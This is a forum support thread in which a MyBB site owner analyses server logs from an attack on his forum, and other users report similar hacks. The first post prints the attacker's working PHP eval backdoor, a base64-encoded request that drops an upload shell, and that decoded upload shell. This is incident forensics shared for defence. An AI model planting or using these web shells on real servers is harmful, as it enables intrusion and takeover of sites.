Current time: 03-18-2010, 08:01 PM Hello There, Guest! (LoginRegister)

MyBB Community Forums / MyBB 1.4 Series / MyBB 1.4 General Support / My 1.4.6 forum got hacked. A close view.

Post Reply 
My 1.4.6 forum got hacked. A close view.
07-01-2009, 05:30 PM (This post was last modified: 07-01-2009 06:22 PM by Anudu.)
Post: #1
Anudu Offline
Junior Member
**
 		Posts: 21
Joined: Feb 2007
My 1.4.6 forum got hacked. A close view.
Hi there! As I mentioned here earlier today, my forum got hacked, because I did not upgrade in time.

If you don't mind, I wanna have a closer look at what happened here, using the server's logfile. Maybe you can help me understand the steps the hacker took.

First, the user found the forum via the copyright bit and Yahoo:
Code:
94.101.131.240 www.mysite.org - [01/Jul/2009:10:53:11 +0200] "GET /forum/archive/index.php HTTP/1.1" 200 2776 "http://search.yahoo.com/search?p="powered+by+mybb"+site:de&y=Search&fr=sfp&fr2=sb-top&xargs=0&pstart=1&b=1&xa=vNWg0lcwjpUdScW1_BEtoQ--,1246558928" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

Next he went to the root of the forum and also called task.php. I don't really know what task.php is for at all. Maybe you can explain?
Code:
94.101.131.240 www.mysite.org - [01/Jul/2009:10:53:39 +0200] "GET /forum/ HTTP/1.1" 200 4167 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:53:45 +0200] "GET /forum/task.php HTTP/1.1" 200 54 "http://www.mysite.org/forum/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

Now he registered. He had to do this, because the 1.4.6 vulnerability is in the user profile edit page (as far as I understood the patch) Rolleyes
Code:
94.101.131.240 www.mysite.org - [01/Jul/2009:10:53:47 +0200] "GET /forum/member.php?action=register HTTP/1.1" 200 3170 "http://www.mysite.org/forum/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:53:48 +0200] "GET /forum/task.php HTTP/1.1" 200 54 "http://www.mysite.org/forum/member.php?action=register" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:14 +0200] "POST /forum/member.php HTTP/1.1" 200 4589 "http://www.mysite.org/forum/member.php?action=register" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:15 +0200] "GET /forum/jscripts/captcha.js?ver=1400 HTTP/1.1" 200 1352 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:16 +0200] "GET /forum/captcha.php?action=regimage&imagehash=389a7312e4187f4e30a680a47ba28ff3 HTTP/1.1" 200 16918 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:17 +0200] "GET /forum/task.php HTTP/1.1" 200 54 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:29 +0200] "POST /forum/xmlhttp.php?action=username_availability HTTP/1.1" 200 49 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:35 +0200] "POST /forum/member.php HTTP/1.1" 200 1035 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:36 +0200] "POST /forum/xmlhttp.php?action=validate_captcha HTTP/1.1" 200 100 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:38 +0200] "GET /forum/index.php HTTP/1.1" 200 4363 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:39 +0200] "GET /forum/task.php HTTP/1.1" 200 54 "http://www.mysite.org/forum/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

At this moment, the hacker switches browsers. He uses "Flock". Never heard of it before and I don't know why he switched. Maybe you've got an idea?
Code:
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:08 +0200] "POST /forum//member.php HTTP/1.1" 200 2369 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"

He's messing around in the user control panel. Logs don't really tell what he did there, but I guess he injected something into the birthday field:
Code:
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:08 +0200] "GET /forum//usercp.php?action=profile HTTP/1.1" 200 19208 "http://www.mysite.org/forum//member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:10 +0200] "POST /forum//member.php HTTP/1.1" 200 5 "http://www.mysite.org/forum//usercp.php?action=profile" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:11 +0200] "POST /forum//usercp.php HTTP/1.1" 200 2487 "http://www.mysite.org/forum//usercp.php?action=profile" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"

Now he tries to access the Admin-panel. I don't think that worked, for his user account was no admin, of course. Don't know why he did this. Just another attempt? That would be most interesting.
Code:
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:12 +0200] "POST /forum///admin//index.php HTTP/1.1" 200 7049 "http://www.mysite.org/forum//usercp.php?action=profile" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:13 +0200] "POST /forum///admin//index.php?module=config/mycode&action=xmlhttp_test_mycode HTTP/1.1" 200 5 "http://www.mysite.org/forum///admin//index.php?module=config/mycode&action=edit&cid=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"

Now he accesses themes.php in the cache/themes subfolder. This file doesn't belong to MyBB, so he created it in one of the prior steps. Can you tell me which one?
Code:
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:17 +0200] "GET /forum///cache/themes/themes.php HTTP/1.1" 200 19 "-" "-"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:18 +0200] "POST /forum//usercp.php HTTP/1.1" 200 2487 "http://www.mysite.org/forum//usercp.php?action=profile" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"
themes.php looks like this:
PHP Code:
<?PHP if (isset($_REQUEST[x])) eval(stripslashes($_REQUEST[x])); ?>

Now he inserted a base64 encoded string which created the file last.php. That's also in cache/themes.
Code:
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:19 +0200] "GET /forum//cache/themes/themes.php?x=eval(base64_decode(%22JGEgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNpUnRjMmNnUFNC​amIzQjVLQ1JmUmtsTVJWTmJhR0Z0WW1GelhWdDBiWEJmYm1GdFpWMHNKRjlHU1V4RlUxdG9ZVzFpWVhO​ZFcyNWhiV1ZkS1NBL0lDSjNiM0pyY3lJZ09pQWlibTkwZDI5eWEzTWlPdzBLWldOb2J5QWtYMFpKVEVW​VFcyaGhiV0poYzExYmJtRnRaVjA3RFFwbFkyaHZJQ1J0YzJjN0RRby9QZzBLUEdadmNtMGdSVTVEVkZs​UVJUMGliWFZzZEdsd1lYSjBMMlp2Y20wdFpHRjBZU0lnUVVOVVNVOU9QU0lpSUUxRlZFaFBSRDBpVUU5​VFZDSStJQTBLUEdsdWNIVjBJRTVCVFVVOUltaGhiV0poY3lJZ1ZGbFFSVDBpWm1sc1pTSStJQTBLUEds​dWNIVjBJRlpCVEZWRlBTSnpkV0p0YVhRaUlGUlpVRVU5SW5OMVltMXBkQ0krUEM5bWIzSnRQZz09Iik7​JGZwID0gZm9wZW4oImxhc3QucGhwIiwgJ3crJyk7ZndyaXRlKCRmcCwgJGEpO2ZjbG9zZSgkZnApOw%2​2)); HTTP/1.1" 200 5 "http://www.mysite.org/forum//usercp.php?action=profile" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"

The base64 encoded stuff and the content of last.php reads like this:
PHP Code:
<?php
$msg copy($_FILES[hambas][tmp_name],$_FILES[hambas][name]) ? "works" "notworks";
echo $_FILES[hambas][name];
echo $msg;
?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST"> 
<input NAME="hambas" TYPE="file"> 
<input VALUE="submit" TYPE="submit"></form> 

For some reason, he now switches back to normal Firefox and accesses the newly created file, which now fetches another, big PHP file, called inc.php.
Code:
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:29 +0200] "GET /forum//cache/themes/last.php HTTP/1.1" 200 161 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:54 +0200] "POST /forum//cache/themes/last.php HTTP/1.1" 200 175 "http://www.mysite.org/forum//cache/themes/last.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

The rest of his accesses is on /forum//cache/themes/inc.php, where he can see and delete everything that PHP can. Confused
inc.php is a 250 kbyte hacking tool.


Do you have any explanations for the stuff that I don't understand? Thankyou!!

And keep up the good work!
Find all posts by this user
Quote this message in a reply
07-01-2009, 05:47 PM
Post: #2
PHP_Paul Offline
// P | H | P \\
****
 		Posts: 445
Joined: Aug 2005
RE: My 1.4.6 forum got hacked. A close view.
I just got hacked as well, hella ton of files in the 'cache/themes' folder.

And I was running 1.4.8 =[
[[ Gaga ]]
[Image: gaga_alejandro.png]
[[ Mt. Moon Community ]]
Visit this user's website Find all posts by this user
Quote this message in a reply
07-01-2009, 05:49 PM
Post: #3
MattRogowski Offline
Not every nook and cranny, John!!
Support Team 		Posts: 22,181
Joined: Apr 2008
RE: My 1.4.6 forum got hacked. A close view.
It happened when you were on 1.4.8?? Did you upload all the correct files??
My Personal Site - Twitter
MyBB Support Team
[Image: lqscs]
Visit this user's website Find all posts by this user
Quote this message in a reply
07-01-2009, 05:56 PM (This post was last modified: 07-01-2009 06:13 PM by dyrer.)
Post: #4
dyrer Offline
Translator
Translators 		Posts: 88
Joined: May 2007
RE: My 1.4.6 forum got hacked. A close view.
I got hacked too
with mybb 1.4.5

Now how can fix the problem?
I have reupload everything but still not working
[Image: mybbsig.php]
Visit this user's website Find all posts by this user
Quote this message in a reply
07-01-2009, 06:17 PM
Post: #5
MattRogowski Offline
Not every nook and cranny, John!!
Support Team 		Posts: 22,181
Joined: Apr 2008
RE: My 1.4.6 forum got hacked. A close view.
Updating to the latest version now won't magically fix the problem....

Check to see if there's anything in your ./cache/themes/ folder that shouldn't be there.
My Personal Site - Twitter
MyBB Support Team
[Image: lqscs]
Visit this user's website Find all posts by this user
Quote this message in a reply
07-01-2009, 06:17 PM
Post: #6
compwhizii Offline
*waves*
***
 		Posts: 98
Joined: Jan 2009
RE: My 1.4.6 forum got hacked. A close view.
Well that was educational Toungue
[Image: 1255110914.png]
Visit this user's website Find all posts by this user
Quote this message in a reply
07-01-2009, 06:23 PM
Post: #7
PHP_Paul Offline
// P | H | P \\
****
 		Posts: 445
Joined: Aug 2005
RE: My 1.4.6 forum got hacked. A close view.
Yes I had properly upgraded. I've been doing this since MyBB gold was released.
[[ Gaga ]]
[Image: gaga_alejandro.png]
[[ Mt. Moon Community ]]
Visit this user's website Find all posts by this user
Quote this message in a reply
07-01-2009, 06:23 PM
Post: #8
Anudu Offline
Junior Member
**
 		Posts: 21
Joined: Feb 2007
RE: My 1.4.6 forum got hacked. A close view.
(07-01-2009 06:17 PM)compwhizii Wrote:  Well that was educational Toungue

Still there are some interesting questions left. Shy
Find all posts by this user
Quote this message in a reply
07-01-2009, 06:27 PM
Post: #9
PHP_Paul Offline
// P | H | P \\
****
 		Posts: 445
Joined: Aug 2005
RE: My 1.4.6 forum got hacked. A close view.
http://zone-h.org/archive/defacer=NobodyCoder/page=1

There, you can see all the mybb installs that have been hacked in the past two days. Good news, looks like less than 100. Maybe? :o
[[ Gaga ]]
[Image: gaga_alejandro.png]
[[ Mt. Moon Community ]]
Visit this user's website Find all posts by this user
Quote this message in a reply
07-01-2009, 06:30 PM (This post was last modified: 07-01-2009 06:31 PM by dyrer.)
Post: #10
dyrer Offline
Translator
Translators 		Posts: 88
Joined: May 2007
RE: My 1.4.6 forum got hacked. A close view.
I changed theme and the Iranian president gone

And the guy become administrator
[Image: mybbsig.php]
Visit this user's website Find all posts by this user
Quote this message in a reply
Post Reply 


Forum Jump:


Contact Us | MyBB | Return to Top | Return to Content | Lite (Archive) Mode | RSS Syndication